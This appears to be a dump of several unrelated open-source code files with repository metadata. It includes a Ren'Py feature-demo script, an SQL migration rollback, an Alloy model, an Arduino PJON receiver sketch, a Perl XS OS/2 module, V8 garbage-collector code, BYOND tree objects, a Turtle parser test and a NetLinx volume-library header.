ui.text('Statistics')
ui.null(height=20)
for name, range, value in stats:
ui.hbox()
ui.text(name, minwidth=150)
ui.bar(600, 22, range, value, ypos=0.5, yanchor='center')
ui.close()
ui.close()
# Period Selection Window.
ui.window(xpos=0,
ypos=200,
xanchor='left',
yanchor='top',
xfill=False,
xminimum=300
)
ui.vbox(xpos=0.5, xanchor='center')
ui.text(day, xpos=0.5, xanchor='center', textalign=0.5)
ui.null(height=20)
for i in periods:
face = i + ": " + plan[i]
button(face, editing == i, ("edit", i))
ui.null(height=20)
ui.textbutton("Continue", clicked=ui.returns(("done", True)))
ui.null(height=20)
ui.close()
# Choice window.
if editing:
ui.window(xpos=300,
ypos=200,
xanchor='left',
yanchor='top',
xfill=False,
xminimum=500
)
ui.vbox()
ui.text("What will you do in the %s?" % editing.lower())
ui.null(height=20)
for i in choices:
button(i, plan[editing] == i, ("set", i),
xpos=0, xanchor='left')
ui.close()
# Window at the bottom.
ui.window()
ui.vbox()
ui.text("To get to the next screen, click the 'Continue' button.")
ui.close()
type, value = ui.interact()
if type == "done":
break
if type == "edit":
editing = value
if type == "set":
plan[editing] = value
editing = None
return plan
init:
image movie = Movie()
python:
povname = ""
pov = DynamicCharacter("povname", color=(255, 0, 0, 255))
$ ectc = Character('Eileen', color=(200, 255, 200, 255),
ctc = anim.Blink("arrow.png"))
$ ectcf = Character('Eileen', color=(200, 255, 200, 255),
ctc = anim.Blink("arrow.png", xpos=760, ypos=560),
ctc_position="fixed")
image eileen animated = Animation(
"9a_vhappy.png", 1.0,
"9a_happy.png", 1.0)
image smanim = anim.SMAnimation(
"r",
anim.State("r", Solid((255, 0, 0, 255))),
anim.State("g", Solid((0, 255, 0, 255))),
anim.State("b", Solid((0, 0, 255, 255))),
anim.Edge("r", .5, "g", dissolve),
anim.Edge("r", .5, "b", dissolve),
anim.Edge("g", .5, "r", dissolve),
anim.Edge("g", .5, "b", dissolve),
anim.Edge("b", .5, "r", dissolve),
anim.Edge("b", .5, "g", dissolve),
)
image cyan base = Image("cyan.png")
image cyan crop = im.Crop("cyan.png", 100, 0, 100, 200)
image cyan composite = im.Composite((200, 300),
(0, 0), "cyan.png",
(0, 50), "cyan.png",
(0, 100), "cyan.png")
image cyan green = im.Map("cyan.png", bmap=im.ramp(0, 0))
image cyan alpha = im.Alpha("cyan.png", 0.5)
image eileen alpha = im.Alpha("9a_happy.png", 0.5)
$ cyanpos = Position(xpos=700, xanchor='right', ypos=100, yanchor='top')
init:
$ slowcirciris = ImageDissolve("circiris.png", 5.0, 8)
$ circirisout = ImageDissolve("circiris.png", 1.0, 8)
$ circirisin = ImageDissolve("circiris.png", 1.0, 8, reverse=True)
$ demotrans = ImageDissolve("demotrans.png", 3.0, 128)
image circiris = "circiris.png"
label demonstrate:
scene bg washington
show eileen happy
e "I can give you a demonstration of some of the features in
Ren'Py, but you'll have to tell me what it is you'd like to
have demonstrated."
menu demo_menu:
"Simple transitions, updated in 4.8.5":
e "Okay, I can tell you about simple transitions. We call
them simple because they aren't that flexible."
e "But don't let that get you down, since they're the
transitions you'll probably use the most."
with None
scene bg whitehouse
show eileen happy
with dissolve
e "The dissolve transition is probably the most useful,
blending one scene into another."
with None
with fade
e "The fade transition fades to black, and then fades back
in to the new scene."
e "If you're going to stay at a black screen, you'll
probably want to use dissolve rather than fade."
with None
scene bg washington
show eileen happy
with pixellate
e "The pixellate transition pixellates out the old scene,
switches to the new scene, and then unpixellates that."
e "It's probably not appropriate for most games, but we
think it's kind of neat."
e "Finally, we can point out that motions can be used as
transitions."
"..."
"......"
$ renpy.play('punch.wav')
with vpunch
e "Hey! Pay attention."
e "I was about to demonstrate vpunch... well, I guess I just
did."
$ renpy.play('punch.wav')
with hpunch
e "We can also shake the screen horizontally, with hpunch."
"ImageDissolve transitions, added in 4.8.7.":
e "ImageDissolve allows us to have dissolve transitions that are
controlled by images."
e "This lets us specify very complex transitions, fairly
simply."
e "Let's try some, and then I'll show how they work."
e "There are two ImageDissolve transitions present by
default in the standard library."
scene black with blinds
scene bg washington
show eileen happy
with blinds
e "The blinds transition opens and closes what looks like
vertical blinds."
scene black with squares
scene bg washington
show eileen happy
with squares
e "The squares transition uses these squares to show
things."
e "I'm not sure why anyone would want to use it, but it
was used in some translated games, so we added it."
e "There are also a few transitions that aren't in the
standard library."
e "These ones require images the size of the screen, and
so we couldn't include them as the size of the screen
can change from game to game."
e "You can find them defined in the source of the demo
script."
scene black with circirisin
e "We can hide things with a circirisin..."
with None
scene bg washington
show eileen happy
with circirisout
e "... and show them again with a circirisout."
e "It's even possible to have weird custom transitions."
scene circiris with demotrans
e "What we're showing here is the picture that's used in
the circiris transitions."
e "If you take a look, the center of it is white, while
the edges are darker."
e "When we use an ImageDissolve, the white will dissolve
in first, followed by progressively darker colors."
e "Let's try it."
with None
scene bg washington
show eileen happy
with slowcirciris
e "It's also possible to reverse the transition, so that
the black pixels are dissolved in first."
"CropMove transitions, added in 4.5.":
e "The CropMove transition class lets us provide a wide
range of transition effects."
hide eileen with dissolve
e "I'll stand offscreen, so you can see some of its modes. I'll read
out the mode name after each transition."
scene bg whitehouse with wiperight
e "We first have wiperight..."
scene bg washington with wipeleft
e "...followed by wipeleft... "
scene bg whitehouse with wipeup
e "...wipeup..."
scene bg washington with wipedown
e "...and wipedown."
e "Next, the slides."
scene bg whitehouse with slideright
e "Slideright..."
scene bg washington with slideleft
e "...slideleft..."
scene bg whitehouse with slideup
e "...slideup..."
scene bg washington with slidedown
e "and slidedown."
e "While the slide transitions slide in the new scene, the
slideaways slide out the old scene."
scene bg whitehouse with slideawayright
e "Slideawayright..."
scene bg washington with slideawayleft
e "...slideawayleft..."
scene bg whitehouse with slideawayup
e "...slideawayup..."
scene bg washington with slideawaydown
e "and slideawaydown."
e "We also have a couple of transitions that use a
rectangular iris."
scene bg whitehouse with irisout
e "There's irisout..."
with None
scene bg washington
show eileen happy
with irisin
e "... and irisin."
e "It's enough to make you feel a bit dizzy."
"Positions and movement, updated in 4.8.":
e "I'm not stuck standing in the middle of the screen,
even though I like being the center of attention."
e "Positions, given with an at clause, specify where I'm
standing."
e "The move transition moves around images that have
changed position."
e "For example..."
show eileen happy at offscreenleft with move
e "I can move over to the offscreenleft position, just off
the left side of the screen."
show eileen happy at left with move
e "The left position has my left side border the left
margin of the screen."
show eileen happy at center with move
e "I can also move to the center..."
show eileen happy at right with move
e "... the right ..."
show eileen happy at offscreenright with move
e "... or even to offscreenright, off the right-hand side
of the screen."
show eileen happy at right with move
e "We don't limit you to these five positions either. You
can always create your own Position objects."
# This is necessary to restart the time at which we are
# shown.
hide eileen happy
show eileen happy at Move((1.0, 1.0, 'right', 'bottom'),
(0.0, 1.0, 'left', 'bottom'),
4.0, repeat=True, bounce=True)
e "It's also possible to have a movement happen while
showing dialogue on the screen, using the Move function."
e "Move can repeat a movement, and even have it bounce
back and forth, like I'm doing now."
scene bg onememorial at Pan((0, 800), (0, 0), 10.0) with dissolve
e "Finally, we can pan around an image larger than the
screen, using the Pan function in an at
clause."
e "That's what we're doing now, panning up a picture of
the memorial to the Big Red One."
with None
scene bg washington
show eileen happy
with dissolve
"Animation, updated in 4.8.5":
e "Ren'Py supports a number of ways of creating
animations."
e "These animations let you vary images, independent of
the user's clicks."
show eileen animated
e "For example, I'm switching my expression back and
forth, once a second."
e "Even though you clicked, I'm still doing it."
e "This is an example of the Animation function at work."
show eileen happy
e "The Animation function is limited to simple lists of
images, with fixed delays between them."
e "The sequence can repeat, or can stop after one
go-through."
e "If you want more control, you can use the
anim.SMAnimation function."
e "It can randomly change images, and even apply
transitions to changes."
with None
scene smanim
show eileen happy
with dissolve
e "Here, we randomly dissolve the background between red,
green, and blue images."
e "Psychadelic."
with None
scene bg washington
show eileen happy
with dissolve
e "It's probably best if we stop here, before somebody's
brain explodes."
"Text tags, updated in 5.1.4.":
e "Text tags let us control the appearance of text that is
shown to the user."
e "Text tags can make text {b}bold{/b}, {i}italic{/i}, or
{u}underlined{/u}."
e "They can make the font size {size=+12}bigger{/size} or
{size=-8}smaller{/size}."
e "They let you pause{w} the display of the text,
optionally with{p}line breaks."
e "They let you include {image=slider_idle.png} images
inside text."
e "They can even change the
{color=#f00}color{/color}
{color=#ff0}of{/color}
{color=#0f0}the{/color}
{color=#0ff}text{/color}."
e "There are also bold, italic, and underline style properties, which can
be styled onto any text."
e "If you find yourself using text tags on every line, you
should probably look at style properties instead."
e "Used with care, text tags can enhance {b}your{/b} game."
e "{u}Used{/u} with {i}abandon,{/i} they {b}can{/b} make {b}your{/b}
game {color=#333}hard{/color} {color=#888}to{/color} {color=#ccc}read{/color}."
e "With great power comes great responsibility, after all."
e "And we want to give you all the power you need."
"Music, sound and movies, updated in 4.5.":
e "Ren'Py supports a number of multimedia functions."
e "You're probably hearing music playing in the
background."
$ renpy.music_stop(fadeout=0.5)
e "We can stop it..."
$ renpy.music_start('sun-flower-slow-drag.mid')
e "... and start it playing again."
# This plays a sound effect.
$ renpy.play("18005551212.wav")
e "We can also play up to eight channels of sound effects
on top of the music."
e "We ship, in the extras/ directory, code to support
characters having voice."
e "Finally, we support playing mpeg movies."
if renpy.exists('Eisenhow1952.mpg'):
e "Since you downloaded the Eisenhower commercial, I can show
it to you as a cutscene."
e "You can click to continue if it gets on your nerves too
much."
$ renpy.movie_cutscene('Eisenhow1952.mpg', 63.0)
hide eileen
show movie at Position(xpos=420, ypos=25, xanchor='left', yanchor='top')
show eileen happy
$ renpy.movie_start_displayable('Eisenhow1952.mpg', (352, 240))
e "Ren'Py can even overlay rendered images on top of a movie,
although that's more taxing for your CPU."
e "It's like I'm some sort of newscaster or something."
$ renpy.movie_stop()
hide movie
else:
e "You haven't downloaded the Eisenhower commercial, so we
can't demonstrate it."
e "That's it for multimedia."
"Image Operations, added in 4.8.5":
e "Image operations allow one to manipulate images as they
are loaded in."
e "These are efficent, as they are only evaluated when an
image is first loaded."
e "This way, there's no extra work that needs to be done
when each frame is drawn to the screen."
show eileen happy at left with move
show cyan base at cyanpos with dissolve
e "Let me show you a test image, a simple cyan circle."
e "We'll be applying some image operations to it, to see
how they can be used."
show cyan crop at cyanpos with dissolve
e "The im.Crop operation can take the image, and chop it
up into a smaller image."
show cyan composite at cyanpos with dissolve
e "The im.Composite operation lets us take multiple images,
and draw them into a single image."
e "While you can do this by showing multiple images, this
is more efficent, if more complex."
show cyan green at cyanpos with dissolve
e "The im.Map operation lets us mess with the red, green,
blue, and alpha channels of an image."
e "In this case, we removed all the blue from the image,
leaving only the green component of cyan."
show cyan alpha at cyanpos with dissolve
e "The im.Alpha operation can adjust the alpha channel on
an image, making things partially transparent."
show eileen alpha at left with dissolve
e "It's useful if a character just happens to be ghost."
with None
hide cyan
show eileen happy at left
with dissolve
e "But that's not the case with me."
show eileen happy with move
"User interaction.":
e "Ren'Py gives a number of ways of interacting with the
user."
e "You've already seen say statements and menus."
e "We can also prompt the user to enter some text."
$ povname = renpy.input("What is your name?")
pov "My name is %(povname)s."
e "Imagemaps let the user click on an image to make a
choice."
# This is an imagemap. It consists of two images, and a list of
# hotspots. For each hotspot we give the coordinates of the left,
# top, right, and bottom sides, and the value to return if it is
# picked.
$ result = renpy.imagemap("ground.png", "selected.png", [
(100, 100, 300, 400, "eileen"),
(500, 100, 700, 400, "lucy")
])
# We've assigned the chosen result from the imagemap to the
# result variable. We can use an if statement to vary what
# happens based on the user's choice.
if result == "eileen":
show eileen vhappy
e "You picked me!"
elif result == "lucy":
show eileen concerned
e "It looks like you picked Lucy."
# Eileen is being a bit possesive here. :-P
if date:
e "You can forget about Saturday."
$ date = False
show eileen happy
e "While these constructs are probably enough for most
visual novels, dating simulations may be more
complicated."
e "The ui functions allow you to create quite complicated
interfaces."
e "For example, try the following scheduling and stats screen,
which could be used by a stat-based dating simulation."
$ day_planner()
e "The ui functions can be used to rewrite many parts of
the interface."
e "Hopefully, this gives you enough power to write any
visual novel you want."
"Potpourri, added in 5.1.2.":
e "Welcome to the potpourri section of the demo."
e "Here, we demonstrate features that don't fit in any of
the other sections, but don't warrant their own
section."
ectc "Here, we demonstrate a click to continue
indicator. In this example, it's nestled in with the
text."
ectc "This also demonstrates the use of the anim.Blink
function."
ectcf "A click to continue image can also be placed at a
fixed location on the screen."
e "That's it for now."
" " # Empty, so we have a blank line.
"That's enough for me.":
return
e "Is there anything else you want demonstrated?"
jump demo_menu
# Here, are a number of customizations that make the game look
# better. We place them down here at the bottom, to make the first few
# lines of the script look better.
#
# These can be deleted without issue, if you do not want them.
init:
# Change some styles, to add images in the background of
# the menus and windows.
$ style.mm_root_window.background = Image("mainmenu.jpg")
$ style.gm_root_window.background = Image("gamemenu.jpg")
$ style.window.background = Frame("frame.png", 25, 25)
# Change the look of the slider.
$ style.bar.left_gutter = 10
$ style.bar.right_gutter = 12
$ style.bar.left_bar = Frame("slider_full.png", 10, 0)
$ style.bar.right_bar = Frame("slider_empty.png", 12, 0)
$ style.bar.thumb = Image("slider_idle.png")
$ style.bar.hover_thumb = Image("slider_hover.png")
$ style.bar.thumb_shadow = Image("slider_shadow.png")
$ style.bar.thumb_offset = -10
# Change some styles involving the margins and padding of the
# default window. (We need this, as we use a frame image that
# includes a drop-shadow.)
$ style.window.xmargin = 0
$ style.window.ymargin = 0
$ style.window.xpadding = 20
$ style.window.top_padding = 5
$ style.window.bottom_padding = 15
# Interface sounds, just for the heck of it.
$ style.button.activate_sound = 'click.wav'
$ style.imagemap.activate_sound = 'click.wav'
$ library.enter_sound = 'click.wav'
$ library.exit_sound = 'click.wav'
$ library.sample_sound = "18005551212.wav"
# Select the transitions that are used when entering and exiting
# the game menu.
$ library.enter_transition = pixellate
$ library.exit_transition = pixellate
# The splashscreen is called, if it exists, before the main menu is
# shown the first time. It is not called if the game has restarted.
# We'll comment it out for now.
#
# label splashscreen:
# scene black
# show text "American Bishoujo Presents..." with dissolve
# $ renpy.pause(1.0)
# hide text with dissolve
#
# return | Ren'Py | 5 | JavascriptID/sourcerer-app | src/test/resources/samples/langs/Ren'Py/example.rpy | [
"MIT"
] |
DROP TABLE "public"."t5";
| SQL | 0 | gh-oss-contributor/graphql-engine-1 | cli/commands/testdata/config-v2-test-project/migrations/1620138179776_create_table_public_t5/down.sql | [
"Apache-2.0",
"MIT"
] |
module appendixA/tube
abstract sig Station {
jubilee, central, circle: set Station
}
sig Jubilee, Central, Circle in Station {}
one sig
Stanmore, BakerStreet, BondStreet, Westminster, Waterloo,
WestRuislip, EalingBroadway, NorthActon, NottingHillGate,
LiverpoolStreet, Epping
extends Station {}
fact {
// the constraints should go here
}
pred show {}
run show
| Alloy | 3 | Kaixi26/org.alloytools.alloy | org.alloytools.alloy.extra/extra/models/book/appendixA/tube.als | [
"Apache-2.0"
] |
/* Giovanni Blu Mitolo 2017 - gioscarab@gmail.com
With this example it is possible to test HC-12 433MHz wireless serial
module (HCMODU0054) along with PJON and ThroughSerial strategy. A software
emulated Serial port is used on pin 2 and 3 to communicate with HC12. The
receiver device should blink every second.*/
#include <PJONThroughSerial.h>
#include <SoftwareSerial.h>
SoftwareSerial HC12(2, 3);
PJONThroughSerial bus(44);
void setup() {
// Initialize LED 13 to be off
pinMode(LED_BUILTIN, OUTPUT);
digitalWrite(LED_BUILTIN, LOW);
// Set HC12 baudrate (you must use the one configured in HC12, default 9600)
HC12.begin(9600);
// Pass the HC12 Serial instance you want to use for PJON communication
bus.strategy.set_serial(&HC12);
bus.begin();
bus.set_receiver(receiver_function);
};
void receiver_function(uint8_t *payload, uint16_t length, const PJON_Packet_Info &packet_info) {
/* Make use of the payload before sending something, the buffer where payload points to is
overwritten when a new message is dispatched */
if(payload[0] == 'B') {
digitalWrite(LED_BUILTIN, HIGH);
delay(30);
digitalWrite(LED_BUILTIN, LOW);
}
};
void loop() {
bus.receive(1000);
};
| Arduino | 4 | jcallano/PJON | examples/ARDUINO/Local/ThroughSerial/HC-12-Blink/Receiver/Receiver.ino | [
"Apache-2.0"
] |
#include "EXTERN.h"
#include "perl.h"
#include "XSUB.h"
#include <process.h>
#define INCL_DOS
#define INCL_DOSERRORS
#include <os2.h>
static unsigned long
constant(char *name, int arg)
{
errno = 0;
if (name[0] == 'P' && name[1] == '_') {
if (strEQ(name, "P_BACKGROUND"))
#ifdef P_BACKGROUND
return P_BACKGROUND;
#else
goto not_there;
#endif
if (strEQ(name, "P_DEBUG"))
#ifdef P_DEBUG
return P_DEBUG;
#else
goto not_there;
#endif
if (strEQ(name, "P_DEFAULT"))
#ifdef P_DEFAULT
return P_DEFAULT;
#else
goto not_there;
#endif
if (strEQ(name, "P_DETACH"))
#ifdef P_DETACH
return P_DETACH;
#else
goto not_there;
#endif
if (strEQ(name, "P_FOREGROUND"))
#ifdef P_FOREGROUND
return P_FOREGROUND;
#else
goto not_there;
#endif
if (strEQ(name, "P_FULLSCREEN"))
#ifdef P_FULLSCREEN
return P_FULLSCREEN;
#else
goto not_there;
#endif
if (strEQ(name, "P_MAXIMIZE"))
#ifdef P_MAXIMIZE
return P_MAXIMIZE;
#else
goto not_there;
#endif
if (strEQ(name, "P_MINIMIZE"))
#ifdef P_MINIMIZE
return P_MINIMIZE;
#else
goto not_there;
#endif
if (strEQ(name, "P_NOCLOSE"))
#ifdef P_NOCLOSE
return P_NOCLOSE;
#else
goto not_there;
#endif
if (strEQ(name, "P_NOSESSION"))
#ifdef P_NOSESSION
return P_NOSESSION;
#else
goto not_there;
#endif
if (strEQ(name, "P_NOWAIT"))
#ifdef P_NOWAIT
return P_NOWAIT;
#else
goto not_there;
#endif
if (strEQ(name, "P_OVERLAY"))
#ifdef P_OVERLAY
return P_OVERLAY;
#else
goto not_there;
#endif
if (strEQ(name, "P_PM"))
#ifdef P_PM
return P_PM;
#else
goto not_there;
#endif
if (strEQ(name, "P_QUOTE"))
#ifdef P_QUOTE
return P_QUOTE;
#else
goto not_there;
#endif
if (strEQ(name, "P_SESSION"))
#ifdef P_SESSION
return P_SESSION;
#else
goto not_there;
#endif
if (strEQ(name, "P_TILDE"))
#ifdef P_TILDE
return P_TILDE;
#else
goto not_there;
#endif
if (strEQ(name, "P_UNRELATED"))
#ifdef P_UNRELATED
return P_UNRELATED;
#else
goto not_there;
#endif
if (strEQ(name, "P_WAIT"))
#ifdef P_WAIT
return P_WAIT;
#else
goto not_there;
#endif
if (strEQ(name, "P_WINDOWED"))
#ifdef P_WINDOWED
return P_WINDOWED;
#else
goto not_there;
#endif
} else if (name[0] == 'T' && name[1] == '_') {
if (strEQ(name, "FAPPTYP_NOTSPEC"))
#ifdef FAPPTYP_NOTSPEC
return FAPPTYP_NOTSPEC;
#else
goto not_there;
#endif
if (strEQ(name, "T_NOTWINDOWCOMPAT"))
#ifdef FAPPTYP_NOTWINDOWCOMPAT
return FAPPTYP_NOTWINDOWCOMPAT;
#else
goto not_there;
#endif
if (strEQ(name, "T_WINDOWCOMPAT"))
#ifdef FAPPTYP_WINDOWCOMPAT
return FAPPTYP_WINDOWCOMPAT;
#else
goto not_there;
#endif
if (strEQ(name, "T_WINDOWAPI"))
#ifdef FAPPTYP_WINDOWAPI
return FAPPTYP_WINDOWAPI;
#else
goto not_there;
#endif
if (strEQ(name, "T_BOUND"))
#ifdef FAPPTYP_BOUND
return FAPPTYP_BOUND;
#else
goto not_there;
#endif
if (strEQ(name, "T_DLL"))
#ifdef FAPPTYP_DLL
return FAPPTYP_DLL;
#else
goto not_there;
#endif
if (strEQ(name, "T_DOS"))
#ifdef FAPPTYP_DOS
return FAPPTYP_DOS;
#else
goto not_there;
#endif
if (strEQ(name, "T_PHYSDRV"))
#ifdef FAPPTYP_PHYSDRV
return FAPPTYP_PHYSDRV;
#else
goto not_there;
#endif
if (strEQ(name, "T_VIRTDRV"))
#ifdef FAPPTYP_VIRTDRV
return FAPPTYP_VIRTDRV;
#else
goto not_there;
#endif
if (strEQ(name, "T_PROTDLL"))
#ifdef FAPPTYP_PROTDLL
return FAPPTYP_PROTDLL;
#else
goto not_there;
#endif
if (strEQ(name, "T_32BIT"))
#ifdef FAPPTYP_32BIT
return FAPPTYP_32BIT;
#else
goto not_there;
#endif
}
errno = EINVAL;
return 0;
not_there:
errno = ENOENT;
return 0;
}
const char* const ptypes[] = { "FS", "DOS", "VIO", "PM", "DETACH" };
static char *
my_type()
{
int rc;
TIB *tib;
PIB *pib;
if (!(_emx_env & 0x200)) return (char*)ptypes[1]; /* not OS/2. */
if (CheckOSError(DosGetInfoBlocks(&tib, &pib)))
return NULL;
return (pib->pib_ultype <= 4 ? (char*)ptypes[pib->pib_ultype] : "UNKNOWN");
}
static ULONG
file_type(char *path)
{
int rc;
ULONG apptype;
if (!(_emx_env & 0x200))
croak("file_type not implemented on DOS"); /* not OS/2. */
if (CheckOSError(DosQueryAppType(path, &apptype))) {
if (rc == ERROR_INVALID_EXE_SIGNATURE)
croak("Invalid EXE signature");
else if (rc == ERROR_EXE_MARKED_INVALID) {
croak("EXE marked invalid");
}
croak("DosQueryAppType err %ld", rc);
}
return apptype;
}
static void
fill_swcntrl(SWCNTRL *swcntrlp)
{
int rc;
PTIB ptib;
PPIB ppib;
HSWITCH hSwitch;
HWND hwndMe;
if (!(_emx_env & 0x200))
croak("switch_entry not implemented on DOS"); /* not OS/2. */
if (CheckOSError(DosGetInfoBlocks(&ptib, &ppib)))
croak("DosGetInfoBlocks err %ld", rc);
if (CheckWinError(hSwitch =
WinQuerySwitchHandle(NULLHANDLE,
(PID)ppib->pib_ulpid)))
croak("WinQuerySwitchHandle err %ld", Perl_rc);
if (CheckOSError(WinQuerySwitchEntry(hSwitch, swcntrlp)))
croak("WinQuerySwitchEntry err %ld", rc);
}
/* static ULONG (* APIENTRY16 pDosSmSetTitle)(ULONG, PSZ); */
ULONG _THUNK_FUNCTION(DosSmSetTitle)(ULONG, PSZ);
#if 0 /* Does not work. */
static ULONG (*pDosSmSetTitle)(ULONG, PSZ);
static void
set_title(char *s)
{
SWCNTRL swcntrl;
static HMODULE hdosc = 0;
BYTE buf[20];
long rc;
fill_swcntrl(&swcntrl);
if (!pDosSmSetTitle || !hdosc) {
if (CheckOSError(DosLoadModule(buf, sizeof buf, "sesmgr", &hdosc)))
croak("Cannot load SESMGR: no `%s'", buf);
if (CheckOSError(DosQueryProcAddr(hdosc, 0, "DOSSMSETTITLE",
(PFN*)&pDosSmSetTitle)))
croak("Cannot load SESMGR.DOSSMSETTITLE, err=%ld", rc);
}
/* (pDosSmSetTitle)(swcntrl.idSession,s); */
rc = ((USHORT)
(_THUNK_PROLOG (2+4);
_THUNK_SHORT (swcntrl.idSession);
_THUNK_FLAT (s);
_THUNK_CALLI (*pDosSmSetTitle)));
if (CheckOSError(rc))
warn("*DOSSMSETTITLE: err=%ld, ses=%ld, addr=%x, *paddr=%x",
rc, swcntrl.idSession, &_THUNK_FUNCTION(DosSmSetTitle),
pDosSmSetTitle);
}
#else /* !0 */
static bool
set_title(char *s)
{
SWCNTRL swcntrl;
static HMODULE hdosc = 0;
BYTE buf[20];
long rc;
fill_swcntrl(&swcntrl);
rc = ((USHORT)
(_THUNK_PROLOG (2+4);
_THUNK_SHORT (swcntrl.idSession);
_THUNK_FLAT (s);
_THUNK_CALL (DosSmSetTitle)));
#if 0
if (CheckOSError(rc))
warn("DOSSMSETTITLE: err=%ld, ses=%ld, addr=%x",
rc, swcntrl.idSession, _THUNK_FUNCTION(DosSmSetTitle));
#endif
return !CheckOSError(rc);
}
#endif /* !0 */
#if 0 /* Does not work. */
USHORT _THUNK_FUNCTION(Win16SetTitle) ();
static void
set_title2(char *s)
{
long rc;
rc = ((USHORT)
(_THUNK_PROLOG (4);
_THUNK_FLAT (s);
_THUNK_CALL (Win16SetTitle)));
if (CheckWinError(rc))
warn("Win16SetTitle: err=%ld", rc);
}
#endif
MODULE = OS2::Process PACKAGE = OS2::Process
unsigned long
constant(name,arg)
char * name
int arg
char *
my_type()
U32
file_type(path)
char *path
U32
process_entry()
PPCODE:
{
SWCNTRL swcntrl;
fill_swcntrl(&swcntrl);
EXTEND(sp,9);
PUSHs(sv_2mortal(newSVpv(swcntrl.szSwtitle, 0)));
PUSHs(sv_2mortal(newSVnv(swcntrl.hwnd)));
PUSHs(sv_2mortal(newSVnv(swcntrl.hwndIcon)));
PUSHs(sv_2mortal(newSViv(swcntrl.hprog)));
PUSHs(sv_2mortal(newSViv(swcntrl.idProcess)));
PUSHs(sv_2mortal(newSViv(swcntrl.idSession)));
PUSHs(sv_2mortal(newSViv(swcntrl.uchVisibility != SWL_INVISIBLE)));
PUSHs(sv_2mortal(newSViv(swcntrl.uchVisibility == SWL_GRAYED)));
PUSHs(sv_2mortal(newSViv(swcntrl.fbJump == SWL_JUMPABLE)));
PUSHs(sv_2mortal(newSViv(swcntrl.bProgType)));
}
bool
set_title(s)
char *s
| XS | 3 | tharindusathis/sourcecodes-of-CodeReadingTheOpenSourcePerspective | perl/os2/os2/Process/Process.xs | [
"Apache-1.1"
] |
// Copyright 2014 the V8 project authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
#include "src/heap/gc-idle-time-handler.h"
#include "src/flags/flags.h"
#include "src/heap/gc-tracer.h"
#include "src/utils/utils.h"
namespace v8 {
namespace internal {
const double GCIdleTimeHandler::kConservativeTimeRatio = 0.9;
void GCIdleTimeHeapState::Print() {
PrintF("size_of_objects=%zu ", size_of_objects);
PrintF("incremental_marking_stopped=%d ", incremental_marking_stopped);
}
size_t GCIdleTimeHandler::EstimateMarkingStepSize(
double idle_time_in_ms, double marking_speed_in_bytes_per_ms) {
DCHECK_LT(0, idle_time_in_ms);
if (marking_speed_in_bytes_per_ms == 0) {
marking_speed_in_bytes_per_ms = kInitialConservativeMarkingSpeed;
}
double marking_step_size = marking_speed_in_bytes_per_ms * idle_time_in_ms;
if (marking_step_size >= kMaximumMarkingStepSize) {
return kMaximumMarkingStepSize;
}
return static_cast<size_t>(marking_step_size * kConservativeTimeRatio);
}
// The following logic is implemented by the controller:
// (1) If we don't have any idle time, do nothing, unless a context was
// disposed, incremental marking is stopped, and the heap is small. Then do
// a full GC.
// (2) If the context disposal rate is high and we cannot perform a full GC,
// we do nothing until the context disposal rate becomes lower.
// (3) If incremental marking is in progress, we perform a marking step.
GCIdleTimeAction GCIdleTimeHandler::Compute(double idle_time_in_ms,
GCIdleTimeHeapState heap_state) {
if (static_cast<int>(idle_time_in_ms) <= 0) {
return GCIdleTimeAction::kDone;
}
if (FLAG_incremental_marking && !heap_state.incremental_marking_stopped) {
return GCIdleTimeAction::kIncrementalStep;
}
return GCIdleTimeAction::kDone;
}
bool GCIdleTimeHandler::Enabled() { return FLAG_incremental_marking; }
} // namespace internal
} // namespace v8
| C++ | 4 | LancerWang001/v8 | src/heap/gc-idle-time-handler.cc | [
"BSD-3-Clause"
] |
/obj/structure/tree
name = "tree"
icon = 'icons/objects/structures/tree.dmi'
icon_state = "stump"
density = FALSE
opacity = TRUE
flags = FLAG_SIMULATED | FLAG_ANCHORED
layer = TURF_LAYER
var/image/canopy_hider
var/obj/structure/canopy/canopy
/obj/structure/tree/New(var/newloc)
. = ..(newloc)
canopy = new(newloc, src)
/obj/structure/tree/Destroy()
QDel(canopy, "tree destroyed")
. = ..()
/obj/structure/tree/Move()
. = ..()
if(.)
loc = canopy.loc
/obj/structure/canopy
density = TRUE
opacity = FALSE
name = "tree canopy"
layer = EFFECTS_LAYER
icon = 'icons/objects/structures/tree.dmi'
icon_state = "canopy"
pixel_x = -32
pixel_y = -32
flags = FLAG_SIMULATED | FLAG_ANCHORED
var/obj/stump
/obj/structure/canopy/Move()
. = ..()
if(.)
loc = stump.loc
/obj/structure/canopy/Destroy()
QDel(stump, "tree destroyed")
. = ..()
/obj/structure/tree/Initialize()
canopy = image(icon = icon, icon_state = "canopy")
canopy.layer = EFFECTS_LAYER
overlays += canopy
canopy_hider = image(loc = src, icon = icon, icon_state = "stump")
canopy_hider.override = TRUE
canopy_hider.layer = layer
icon_state = "stump"
if(prob(75))
var/matrix/M = matrix()
M.Turn(pick(90, 180, 270))
transform = M
. = ..()
/obj/structure/tree/ManipulatedBy(var/mob/user, var/obj/item/prop, var/slot)
. = ..()
if(!. && !user.OnActionCooldown())
overlays.Cut()
/obj/structure/tree/Crossed(atom/movable/O)
. = ..()
var/mob/M = O
if(istype(M) && M.client)
M.client.images |= canopy_hider
/obj/structure/tree/Uncrossed(atom/movable/O)
. = ..()
var/mob/M = O
if(istype(M) && M.client)
M.client.images -= canopy_hider
| DM | 4 | AntimoniumGame/Antimonium | code/objects/structures/flora/tree.dm | [
"CC-BY-4.0"
] |
_:b1 a _:b2 .
_:b2 a _:B1 . | Turtle | 0 | joshrose/audacity | lib-src/lv2/serd/tests/bad/bad-id-clash.ttl | [
"CC-BY-3.0"
] |
(***********************************************************
AMX VOLUME CONTROL LIBRARY
v1.0.0
Website: https://github.com/amclain/amx-lib-volume
This is a snake case wrapper for the volume control
library functions. To use this file, make sure to include
amx-lib-volume.axi in the workspace.
For more information, see:
amx-lib-volume.axi
*************************************************************
Copyright 2011, 2012, 2014 Alex McLain
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
************************************************************)
#include 'amx-lib-volume'
#if_not_defined AMX_LIB_VOLUME_SC
#define AMX_LIB_VOLUME_SC 1
(***********************************************************)
/*
* Initialize volume control.
*
* Parameters min, max, and numSteps can be set to 0 if not needed.
*/
